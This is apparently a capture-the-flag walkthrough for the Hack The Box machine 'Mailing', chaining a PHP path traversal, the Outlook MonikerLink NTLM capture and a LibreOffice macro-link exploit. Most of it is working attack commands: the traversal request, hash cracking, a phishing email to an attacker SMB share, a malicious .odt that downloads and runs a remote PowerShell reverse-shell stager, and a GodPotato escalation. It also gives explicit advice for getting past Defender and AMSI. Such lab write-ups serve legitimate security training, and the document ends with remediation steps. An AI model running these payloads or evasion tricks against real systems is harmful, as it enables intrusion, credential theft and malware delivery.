• OS: Windows Server 2019
• Domain / vhosts: mailing.htb

Summary

Mailing is a focused chain of three published 2023–2024 CVEs:

1. PHP path traversal in /download.php?file= leaks the hMailServer config (hMailServer.ini), which contains the admin password as an MD5 hash. Cracked offline → <ADMIN_PW> for the SMTP/IMAP admin.
2. CVE-2024-21413 (Outlook “Moniker”): a file:// URL with a !something suffix bypasses Outlook’s Protected View when rendered. Send the email through the now-authenticated SMTP, the simulated maya user opens it, and her NetNTLMv2 lands in responder for cracking → <MAYA_PW>. WinRM as maya reads user.txt.
3. CVE-2023-2255: a LibreOffice link-handler abuse — <text:link xlink:href="macro:shell(<command>)"> runs as the user opening the document, with no macro-warning prompt. Drop an evil.odt into the writable Important Documents SMB share; the simulated localadmin opens it on a schedule, our payload fires, and we land a reverse shell. root.txt is on localadmin’s desktop, not Administrator’s, so the chain ends here — no further privesc to SYSTEM is required (although a SeImpersonate account like localadmin is one GodPotato away from SYSTEM if the flag were placed in the canonical Admin Desktop).

The two key operational deltas vs the public reconstruction were on step 3:

• **Defender on this 2019 build silently kills `powershell -enc `** payloads delivered through the LibreOffice `shell()` macro — the macro fires (proven by writing a cmd-only POC marker file), but the encoded PowerShell never runs. Fix: switch the payload to `cmd.exe /c powershell IEX(IWR -useb http://atk:8000/r.ps1)` (no `-enc`, fetches the reverse-shell source over HTTP). The IEX path doesn't trigger AMSI string match for the canonical `-enc ` signature.
• localadmin\Desktop\root.txt, not Administrator’s. A one-off HTB convention on this box.

Recon

25/465/587  hMailServer SMTP
80          Microsoft IIS 10.0 (PHP)
143/993     hMailServer IMAP
445         SMB

Landing page advertises Maya / Ruy / Gregory and a “Download Instructions” button hitting download.php?file=instructions.pdf.

curl -s 'http://mailing.htb/download.php?file=..\..\..\Program%20Files%20(x86)\hMailServer\Bin\hMailServer.ini'

The traversal is OS-style (\ not /) and the relative depth needs three ..\..\..\ to clear the IIS doc root. The leaked ini section:

[Security]
AdministratorPassword=<MD5>

Crack with hashcat -m 0 against rockyou — clean dictionary hit.

hashcat -m 0 admin.md5 /usr/share/wordlists/rockyou.txt
# → <ADMIN_PW>

These are SMTP admin credentials; they auth submission for internal/external recipients. Authenticated SMTP is the prerequisite for delivering the Outlook-Moniker phish to [email protected].

Foothold — CVE-2024-21413 → maya WinRM

Run responder -I tun0 to capture SMB auth. The CVE-2024-21413 payload is a file:// URL with a !something suffix embedded in HTML email body (the ! is what bypasses Outlook’s path validation):

<a href="file:////<ATTACKER>/share/test.rtf!something">click</a>

swaks --to [email protected] --from [email protected] \
  --auth LOGIN \
  --auth-user [email protected] \
  --auth-password <ADMIN_PW> \
  --server mailing.htb:25 \
  --header 'Subject: Updated docs' \
  --add-header 'Content-Type: text/html' \
  --body '<a href="file:////<ATTACKER>/share/test.rtf!something">click</a>'

swaks queues; within ~30 s the simulated maya opens the mail in Outlook and Explorer’s preview-pane SMB lookup hits our responder. Multiple MAYA::MAILING:... NetNTLMv2 hashes land in SMB-NTLMv2-SSP-<TARGET>.txt.

Crack:

hashcat -m 5600 maya.hash /usr/share/wordlists/rockyou.txt
# → <MAYA_PW>

evil-winrm -i mailing.htb -u maya -p '<MAYA_PW>' — user.txt in C:\Users\maya\Desktop\.

“Privesc” — CVE-2023-2255 → localadmin → root.txt

net share and most net.exe commands return System error 5 for maya over WinRM. Pivot to smbclient with maya’s creds:

smbclient -U mailing/maya%<MAYA_PW> -L //mailing.htb
# Important Documents — Disk

Build the malicious .odt using elweth-sec’s PoC for CVE-2023-2255. The vulnerability: when LibreOffice renders a text link with xlink:href="macro:shell(<cmd>)", the BASIC shell() function is invoked at link-resolution time, before the user is asked about macros — the macro warning is bypassed because macro: URIs are treated as link-protocol handlers, not macro execution.

git clone https://github.com/elweth-sec/CVE-2023-2255
cd CVE-2023-2255
# IMPORTANT: payload must be cmd /c invoking powershell IEX, NOT powershell -enc
python3 CVE-2023-2255.py \
  --cmd 'cmd.exe /c powershell IEX(IWR -useb http://<ATTACKER>:8000/r.ps1)' \
  --output evil.odt

r.ps1 is a vanilla TCPClient reverse-shell stager pointing at listener on 4444. Host it via python3 -m http.server 8000, upload the .odt to the share, listen:

smbclient -U mailing/maya%<MAYA_PW> '//mailing.htb/Important Documents' \
  -c 'put evil.odt evil.odt'

while true; do nc -lvnp 4444 ; sleep 1 ; done

Within ~1 min the simulated localadmin opens the file and the reverse shell connects:

connect to [<ATTACKER>] from (UNKNOWN) [<TARGET>] 58904
PS C:\Program Files\LibreOffice\program> whoami
mailing\localadmin

root.txt is on localadmin’s own desktop:

type C:\Users\localadmin\Desktop\root.txt

If root.txt were on Administrator (general case)

localadmin has SeImpersonatePrivilege (visible in whoami /priv), so the standard Potato-family escalation applies. GodPotato runs cleanly from C:\Windows\Tasks\ (the canonical write-friendly directory; %TEMP% sometimes triggers on-write Defender quarantine):

iwr http://<ATTACKER>:8000/GodPotato.exe -OutFile C:\Windows\Tasks\gp.exe
C:\Windows\Tasks\gp.exe -cmd 'cmd.exe /c whoami > C:\Users\Public\who.txt'
type C:\Users\Public\who.txt    # nt authority\system

GodPotato output confirms: [*] CurrentUser: NT AUTHORITY\SYSTEM.

Why each step worked

• ?file= traversal: zero filename validation on download.php. The PHP wrapper appends to a base path and serves whatever ..\..\.. produces.
• CVE-2024-21413 (Outlook “Moniker”): Outlook’s path validator on file:// URIs failed when a ! suffix was appended after the resource — the parser treated everything before the ! as the SMB resource and silently authenticated to it without prompting (Protected View was bypassed). The file:// to a UNC path triggers SMB → NTLMSSP → captured.
• <MAYA_PW> cracked from rockyou: standard CTF tradeoff; the cracked password is in the dictionary because the box is designed to be solvable on a modest laptop.
• CVE-2023-2255 (LibreOffice link macro): The xlink:href="macro:..." URI scheme dispatches to the BASIC shell() runtime via the link handler before the per-document macro security policy is consulted. Result: a document with no macros (in the document-level sense) executes arbitrary commands as the user opening it.
• Defender on PowerShell -enc but not on cmd /c IEX: the AMSI signature for the canonical powershell -enc <long-b64> pattern is what triggered. cmd.exe /c powershell IEX(IWR http://...) is short enough to slip past the b64 detection and IEX of a downloaded script. The key insight: AMSI pattern-matches the on-the-wire command line; obfuscating the transport (download then IEX) defeats it.
• localadmin writes the user flag location: the box’s HTB-author chose to put root.txt on localadmin’s desktop rather than the canonical Administrator location. So the shell as localadmin finishes the chain. Don’t reflexively GodPotato to SYSTEM if the flag is already accessible.

Counterfactuals

• Validate ?file= against an allowlist of files in the download directory.
• Patch Outlook to KB5034827 / March 2024 cumulative (CVE-2024-21413 fix). The “Moniker” parser correctly rejects !-suffixed file:// URLs after the patch.
• Patch LibreOffice ≥ 7.4.7 / 7.5.3 (CVE-2023-2255 fix). The macro: link-handler now requires explicit user confirmation.
• Don’t expose a writable share to a low-priv user that’s also read by a higher-priv simulator. Gate write to a service account that doesn’t need to share storage with localadmin.
• Don’t reuse passwords between the hMailServer admin and any domain account. (Not done here, but a common follow-up finding on similar boxes.)

Key Takeaways

• Three CVEs, none of which need framework auth bypass. Mailing is a “patch what’s deployed” box: the foothold-to-root chain is entirely about software running outdated versions. This is the realistic-pentest beat — internal mail server, Outlook on workstations, an “office” doc parser. All catastrophically pre-patch.
• AMSI’s signature for powershell -enc <long-b64> is the thing that bites you. When a delivery channel can run arbitrary command lines (LibreOffice macro, scheduled task, print-job hijack), the cmd-line transport pattern matters more than the actual payload. cmd /c powershell IEX(IWR ...) is a near-universal alternative that fits in a few hundred chars and downloads the actual stager.
• A cmd /c poc-marker.txt smoke test is cheap. When a payload “doesn’t fire,” upload a one-line marker like cmd /c echo poc > C:\Users\Public\poc.txt first. If the marker lands but the rev-shell payload doesn’t, the issue is the payload (AMSI/Defender), not the trigger. This was the delta that unstuck the chain on this run.
• Look at the actual Desktop\ before assuming SYSTEM is required. HTB occasionally puts root.txt on the user-of-the-foothold desktop instead of Administrator’s. Reading directories before launching escalations saves time.
• Important Documents shares are an RCE vector even from outside the AD. Maya is a regular SMB user (no special rights), but the share is auto-watched and auto-opened by a privileged process. Treat any share that another user consumes as a primitive — drop a typed file there and watch the trigger pop.

References

• 0xdf, “HTB: Mailing” — https://0xdf.gitlab.io/2024/09/07/htb-mailing.html
• IppSec, “Mailing” — https://ippsec.rocks/?#Mailing
• CVE-2024-21413 advisory and Check Point research write-up (“MonikerLink”).
• CVE-2023-2255 advisory; elweth-sec PoC at https://github.com/elweth-sec/CVE-2023-2255.
• BeichenDream/GodPotato — https://github.com/BeichenDream/GodPotato.